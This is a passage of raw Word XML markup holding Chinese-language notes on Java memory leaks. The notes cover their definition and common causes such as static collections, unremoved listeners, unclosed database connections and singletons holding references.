          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实际上这些对象已经是无用的，但还被引用，</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>就无能为力了</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>事实上</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>认为它还有用</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，这一点是导致内存泄漏最重要的原因。</w:t>
      </w:r>
      <w:r w:rsidRPr="0018487C">
        <w:rPr>
          <w:rFonts w:ascii="simsun" w:eastAsia="宋体" w:hAnsi="simsun" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24802" w:rsidRPr="00F41A4C" w:rsidRDefault="00A24802" w:rsidP="00A24802">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内存泄漏：分配出去的内存回收不了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A24802" w:rsidRPr="00F41A4C" w:rsidRDefault="00A24802" w:rsidP="008E4356">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内存溢出：指系统内存不够用了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00393E19" w:rsidRDefault="00393E19" w:rsidP="00393E19">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEDD"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00393E19" w:rsidRDefault="00393E19" w:rsidP="00393E19">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEDD"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>、静态集合类像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>等的使用最容易出现内存泄露，这些</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5C2D">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>静态变量的生命周期和应用程序一致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，所有的对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>也不能被释放，因为他们也将一直被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>等应用着。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00393E19" w:rsidRDefault="00393E19" w:rsidP="00393E19">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEDD"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>、内部类和外部类的引用容易出现内存泄露的问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00393E19" w:rsidRDefault="00393E19" w:rsidP="00393E19">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEDD"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>、监听器的使用，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>中往往会使用到监听器，在释放对象的同时没有相应删除监听器的时候也可能导致内存泄露。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00393E19" w:rsidRDefault="00393E19" w:rsidP="00393E19">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEDD"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>、大量临时变量的使用，没有及时将对象设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>也可能导致内存的泄露</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00393E19" w:rsidRDefault="00393E19" w:rsidP="00393E19">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEDD"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>、数据库的连接没有关闭情况，包括连接池方法连接数据库，如果没有关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ResultSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>等也都可能出现内存泄露的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E04D8C" w:rsidRDefault="00DE1F4D" w:rsidP="008C5C2D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="390"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0002248B" w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>单例对象在被初始化后将在</w:t>
      </w:r>
      <w:r w:rsidR="0002248B" w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="0002248B" w:rsidRPr="00DD3DCC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的整个生命周期中存在（以静态变量的方式），如果</w:t>
      </w:r>
      <w:r w:rsidR="0002248B" w:rsidRPr="0067590C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>单例对象持有外部对象的引用，那么这个外部对象将不能被</w:t>
      </w:r>
      <w:r w:rsidR="0002248B" w:rsidRPr="0067590C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidR="0002248B" w:rsidRPr="0067590C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>正常回收，导致内存泄露</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C5C2D" w:rsidRDefault="008C5C2D" w:rsidP="008C5C2D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="390"/>
        </w:tabs>
        <w:spacing w:after="107" w:line="258" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>容易引起内存泄漏的几大原因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>静态集合类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等静态集合类的使用最容易引起内存泄漏，因为这些静态变量的生命周期与应用程序一致，如示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，如果该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是静态的，那么它将一直存在，而其中所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象也不能被释放，因为它们也将一直被该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Vector </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>引用着。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>监听器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
